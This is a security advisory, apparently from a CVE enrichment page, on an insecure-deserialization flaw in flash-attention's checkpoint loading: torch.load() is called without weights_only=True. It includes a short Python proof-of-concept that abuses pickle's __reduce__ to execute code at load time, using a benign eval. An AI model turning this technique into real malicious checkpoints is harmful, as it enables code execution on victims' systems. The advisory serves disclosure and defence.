Impact
The flash‑attention framework contains an insecure deserialization flaw in its checkpoint‑loading mechanism. The load_checkpoint() function and the checkpoint logic in eval.py call torch.load() without weights_only=True, so loading a checkpoint deserializes arbitrary Python objects through the pickle module. An attacker can craft a malicious checkpoint file; when a victim loads it during model warm‑starting or evaluation, arbitrary Python code executes on the victim's system. The flaw maps to CWE‑502 (Deserialization of Untrusted Data) and CWE‑94 (Code Injection), giving an attacker full control of the executing process and compromising the confidentiality, integrity, and availability of the host.
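A minimal, stdlib-only sketch of the underlying mechanism: pickle's __reduce__ protocol lets a crafted object instruct the deserializer to call an arbitrary callable at load time. torch.load() without weights_only=True routes through this same pickle machinery; the class name below is illustrative, and a harmless eval expression stands in for a real payload such as os.system.

```python
import pickle

# Sketch of how a crafted checkpoint achieves code execution (CWE-502).
# __reduce__ tells pickle to invoke an arbitrary callable during
# deserialization; a real exploit would substitute a dangerous
# callable (e.g. os.system) for the harmless eval used here.
class MaliciousCheckpoint:
    def __reduce__(self):
        # pickle executes eval("21 * 2") while loading the payload
        return (eval, ("21 * 2",))

payload = pickle.dumps(MaliciousCheckpoint())

# The victim merely "loads a checkpoint" -- yet the attacker-chosen
# call runs before load() even returns.
result = pickle.loads(payload)
print(result)  # 42 -- proof the embedded expression executed
```

The key point is that no method of the loaded object needs to be called: deserialization itself triggers execution.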
Affected Systems
The vulnerability manifests in the flash‑attention library maintained by Dao‑AILab, specifically at commit e724e2588cbe754beb97cf7c011b5e7e34119e62 (2025‑04‑13). Every use of load_checkpoint() or the eval.py checkpoint loader in this version is affected. No vendor‑specific product name applies because flash‑attention is an open‑source training framework; consumers must audit the exact commit or release they deploy.
Risk and Exploitability
The vulnerability permits arbitrary code execution when an untrusted checkpoint file is loaded; the attack vector is local, requiring the attacker to supply or influence the checkpoint rather than reach the host over the network. The EPSS score is below 1%, indicating a low but non‑zero likelihood of exploitation, and the issue is not listed in the CISA KEV catalog. The CVSS score of 7.3 classifies it as high severity. An attacker who can supply or influence the checkpoint file can run code with the permissions of the process executing flash‑attention. The absence of a published official patch further increases the urgency of mitigation.
OpenCVE Enrichment